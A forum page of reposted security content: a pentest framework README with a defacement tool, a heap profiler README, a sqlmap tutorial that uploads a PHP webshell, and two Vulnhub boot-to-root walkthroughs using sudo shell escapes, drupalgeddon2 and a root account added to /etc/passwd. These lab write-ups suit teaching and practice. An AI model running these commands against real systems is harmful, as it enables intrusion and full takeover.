  23. A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter Menu Web Pentest | Banner Grab | Whois | Traceroute | DNS Record | Reverse DNS Lookup | Zone Transfer Lookup | Port Scan | Admin Panel Scan | Subdomain Scan | CMS Identify | Reverse IP Lookup | Subnet Lookup | Extract Page Links Generator | Deface Page Installation Modules $ pip install -r requirements.txt OR $ pip install colorama requests python-whois dnspython bs4 Path (Optional) Linux $ sudo nano ~/.bashrc # Add this in the bottom of the file export PATH=$PATH:<Path of the Tool>/pureblood $ pureblood.py Windows Windows Search > Edit The System Environment Variables > Environment Variables > Path > Edit > New > (Path to the Tool) > Ok > Ok > Apply / Ok $ pureblood MAC $ nano /etc/paths # Add this in the bottom of the file export PATH=$PATH:<Path of the Tool>/pureblood/ $ pureblood.py Android (Termux / GNURoot) $ nano ~/.bashrc # Add this in the bottom of the file export PATH=$PATH:<Path of the Tool>/pureblood/ $ pureblood.py Build With Colorama Requests Python-whois Dnspython BeautifulSoup Authors Cr4sHCoD3 - Pure Blood Download Pureblood
  24. Anastasis

    Memoro - A Detailed Heap Profiler

    Memoro is a highly detailed heap profiler. Memoro not only shows you where and when your program makes heap allocations, but will show you how your program actually used that memory. Memoro collects detailed information on accesses to the heap, including reads and writes to memory and when they happen, to give you an idea of how efficiently your program uses heap memory. Memoro includes a visualizer application that distills all this information into scores and indicators to help you pinpoint problem areas. For more detailed information about how Memoro works, see here Build & Install Building the Instrumented compiler First, you will need to build a local version of LLVM/Clang so you can compile your code with Memoro instrumentation. Pre-built releases are not yet available, but if enough people bug me perhaps I will host here. Follow the LLVM/Clang build instructions here, but use the specific repositories listed below. Memoro is not yet in the LLVM/Clang dev branch. It's recommended to use the git mirror repositories instead of SVN. For the main LLVM repo, the Clang repo, and the CompilerRT repo, use the Memoro versions: LLVM Clang CompilerRT These repos should default to branch r40_dev (Memoro is based off of LLVM release_40). Optionally compile with libcxx and libcxxabi. Building the Visusalizer C++ lib Clone this repo with git clone git@github.com:epfl-vlsc/memoro.git Enter the directory. $ cd memoro Run npm install to make sure all JS dependencies are present. You will then need to build the C++ data processing addon. To do this, you may first need to install node-gyp (npm install -g node-gyp) Then, cd cpp node-gyp build --release --target=1.7.9 --arch=x64 --dist-url=https://atom.io/download/electron cd .. The target is the electon version that must match that used to run the main app. Adjust this if you need. Also adjust arch if you need, however I have not yet tested on non-*nix x64 systems. There is a Makefile as well that should work for most users. Obviously, you will need a C++ compiler installed for node-gyp to use. Running Instrument and Run your Software First, build the software you want to profile using the LLVM/Clang you have built earlier. Add the compiler flag -fsanitize=memoro to add instrumentation and optionally -fno-omit-frame-pointer to get nice stack traces. If you have a separate linking step, this may also need -fsanitize=memoro to ensure the Memoro/Sanitizer runtime is linked. It is recommended to use the LLVM symbolizer for stack traces, set env variable MEMORO_SYMBOLIZER_PATH to point to where llvm-symbolizer resides. Or just have it in your PATH. Run your program. After completion, the Memoro runtime will generate two files, *.trace and *.chunks. These can be opened and viewed using the visualizer. Use the Memoro Visualizer After building the C++ addon, the app can be run directly from the repo directory electron . File->Open or Cmd/Ctrl-O to open, navigate to and select either the trace or chunk file. Happy hunting for heap problems 🙂 Installing the Visualizer Use electron-packager to gather and export all code and assets into an application package. electron-packager . --overwrite --platform=<platform> --arch=x64 --electron-version=1.7.9 --icon=assets/icons/icon64.icns --prune=true --out=release-builds Again, adjust the platform, arch, and electron version if necessary. Download Memoro
  25. Hello everyone and welcome to the par two of our sqlmap series. In this article we’ll be exploiting an error based SQL injection to upload a shell on the web server and gain control over it! Now, how to do this, tools required, everything is discussed in as much detail as possible. So, let’s dive right in. Since, attacking a live website is a crime, we’ll be setting up a local host in a windows system using XAMPP server and we’ll use SQLi Dhakkan to create sql vulnerabilities in a database. You can download XAMPP and SQL dhakkan from here and here respectively. Step one is to fire up XAMPP control panel and put sql dhakkan in 😄 /xampp/htdocs directory which is the default directory for the webpages. The IP address on which sql dhakkan is hosted in my network is 192.168.1.124 So, let’s start by checking the ports open on the server using nmap. As we can see that mysql is up and running on the host so we are good to apply SQLMAP. sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 --dbs 1 sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 --dbs Hence, we can see numerous databases loaded, so our sqlmap attack was successful. Checking privileges of the users in database Now, to read a file it is very much important to see whether the user has FILE privileges or not. If we have file privileges we will be able to read files on the server and moreover, write the files on the server!! sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 --privileges 1 sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 --privileges As we can see that root@localhost has the FILE privilege. Let’s see who the current user of this server is. As we can see that the current use has the FILE privileges so we can apply – -file-read to read a file from the server and – -file-write to write a file on the server! Reading a file from the web server Let’s try reading a file in the public directory, let’s say, index.php. sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 --file-read=/xampp/htdocs/index.php --batch 1 sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 --file-read=/xampp/htdocs/index.php --batch We have read a file from a known directory successfully! We can apply directory buster to find other folders and files and read them too if we have the privileges! Uploading a shell on the web server Now, let’s try and upload a file on the web server. To do this we are using the “- -file-write” command and “- -file-dest” to put it in the desired destination. For the sake of uploading a shell on the server, we’ll be choosing a simple command injection php shell that is already available in kali in the /usr/share/webshells directory and has the name simple-backdoor.php cd /usr/share/webshells/php ls cp simple-backdoor.php /root/Desktop/shell.php 1 2 3 cd /usr/share/webshells/php ls cp simple-backdoor.php /root/Desktop/shell.php Now, we have moved the shell on the desktop. Let’s try to upload this on the web server. sqlmap –u 192.168.1.124/sqli/Less-1.?id=1 --file-write=/root/Desktop/shell.php --file-dest=/xampp/htdocs/shell.php - -batch 1 sqlmap –u 192.168.1.124/sqli/Less-1.?id=1 --file-write=/root/Desktop/shell.php --file-dest=/xampp/htdocs/shell.php - -batch It has been uploaded successfully!! Let’s check whether it was uploaded or not! It indeed did get uploaded. Now, we’ll try and access the shell from browser. 192.168.1.124/shell.php It is a command line shell, hence, we can execute any windows command on the browser itself remotely! The usage is: …..php?cmd=< windows command > Let’s try and run ipconfig on the browser Hence, we have successfully uploaded a shell and created a command injection vulnerability! Thanks for giving it a read!
  26. Anastasis

    Hack the Lin.Security VM (Boot to Root)

    Hello Guy’s!! In our previous article “Linux Privilege Escalation using Sudo Rights” we had described how some weak misconfiguration sudo rights can lead to root privilege escalation and today I am going to solve the CTF “Lin.Security – Vulnhub” which is design on weak sudo right permissions for beginners to test their skillset through this VM. This is one of the simplest labs to learn pen testing and also avoid misconfiguration, which can lead to full system compromise. This lab has been designed by the researcher to help us understand, how certain built-in applications and services if misconfigured, may be abused by an attacker. Here an up-to-date Ubuntu distro (18.04 LTS) suffers from a number of vulnerabilities that allow a user to escalate to root on the box. Let’s see how to install and start? The image is just under 1.7 GB and can be downloaded using the link of vulnhub.com (https://www.vulnhub.com/?q=lin.security&sort=date-asc&type=vm#). On opening the OVA file, a VM named lin.security will be imported and configured with a NAT adapter, but this can be changed to bridge via the preferences of your preferred virtualization platform. Let’s move now to find the ways to root this lab!! The first thing before doing any of the CTF is to read the instructions carefully before starting your vulnerability assessment and save your precious time. The writer of the lab has given a hint in terms of user-id & password of one of the users. It is “To get started you can log onto the host with the credentials: bob/secret“ The IP of my lab is 192.168.1.104. I run the Nmap Aggressive scan to find out the open ports and relative services. nmap -A 192.168.1.104 1 nmap -A 192.168.1.104 Here is the snippet of Nmap result where I found that Port 22 is open along with two other ports. I used the port 22 (SSH) to login into the machine with given credentials: bob/secret. ssh bob@192.168.1.104 1 ssh bob@192.168.1.104 After ‘logging in’ I tried to check the sudo rights for user bob: sudo -l The next prompt asked for the root password and I tried the same credentials “secret” and it worked!! I can see all the permissions which bob has and now I can easily root the machine using any of these permitted commands. Let’s try the first way! sudo bash whoami 1 2 sudo bash whoami –> Boom!! It’s rooted. Second way! sudo sh whoami 1 2 sudo sh whoami Third way Another way using ‘find’ command to do privilege escalation! sudo find /home -exec /bin/bash \; id whoami 1 2 3 sudo find /home -exec /bin/bash \; id whoami Fourth way One more way using ‘perl – one liner’ for privilege escalation! sudo perl -e 'exec' "/bin/bash";' id whoami 1 2 3 sudo perl -e 'exec' "/bin/bash";' id whoami
  27. Anastasis

    Hack the Billu Box2 VM (Boot to Root)

    Hello freinds!! Today we are going to solve latest CTF challenge “Billu Box2” presented by vulnhub for penetration practice and design by Manish Kishan Tanwar. This virtual machine is having intermediate to medium difficulty level. One need to break into VM using web application and from there escalate privileges to gain root access. You can download it from this Link: https://www.vulnhub.com/entry/billu-b0x-2,238/ Penetration Methodologies Network scaning Exploit Drupal (Metasploit) privilege escalation via Writable /passwd file Get root access and capture the flag Let’s Begin!! You will get target VM machine IP at the time of boot-up as you can observe we have it as 192.168.1.108. So let’s start with nmap port enumeration and execute following command in our terminal. nmap -A 192.168.1.108 1 nmap -A 192.168.1.108 Here I noticed drupal 8 CMS is running through apache and might be you are knowing that metasploit contains a module to compromise the target by exploiting drupalgeddon. So let’s try to exploit this web application with the help of metasploit module and for that execute following command: use exploit/unix/webapp/drupal_drupalgeddon2 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.108 msf exploit(unix/webapp/drupal_drupalgeddon2)> exploit 1 2 3 use exploit/unix/webapp/drupal_drupalgeddon2 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.108 msf exploit(unix/webapp/drupal_drupalgeddon2)> exploit Yippee!! We have owned meterpreter session 1, now let’s go for privilege escalation. Firstly let access proper tty shell with help of python one-liner and identify kernel version. python -c 'import pty;pty.spawn("/bin/sh")' lsb_release -a 1 2 python -c 'import pty;pty.spawn("/bin/sh")' lsb_release -a I search for any relative kernel exploit but didn’t found any working exploit so I penetrated little bit more and enumerated that the /passwd file has ALL 777 permission as shown in the below image. With help of cat command we open /etc/passwd file and notice an entry for local user “indishell” inside it. Since this file has ALL permission which mean I can modify it very easily. So I copied the whole /passwd file in an empty text file in our local machine and saved at /root/Desktop/passwd. As you can observe the entry for user indishell contain encrypted passwd and I don’t know which encryption is used therefore I will try to replace the original salt password. We can use openssl command which will generate an encrypted password with salt. openssl passwd -1 -salt abc pass123 1 openssl passwd -1 -salt abc pass123 Now copy it which is new salt password for password:pass123 and paste at the place of original salt password for user indishell. As you can observe, we had manipulated old password hash from our new password salt and also modify UID GID as 0:0 to make him member of root user. Now transfer your modified passwd file into target’s VM machine and follow below steps to access root shell terminal. cd /etc upload /root/Desktop/passwd python -c 'import pty;pty.spawn("/bin/sh")' su indishell whoami 1 2 3 4 5 cd /etc upload /root/Desktop/passwd python -c 'import pty;pty.spawn("/bin/sh")' su indishell whoami B000M!!!! We hit the Goal and got root access of this VM. This vulnerability can be exploit in multiple way and for detail open this link: http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/
  1. Load more activity
×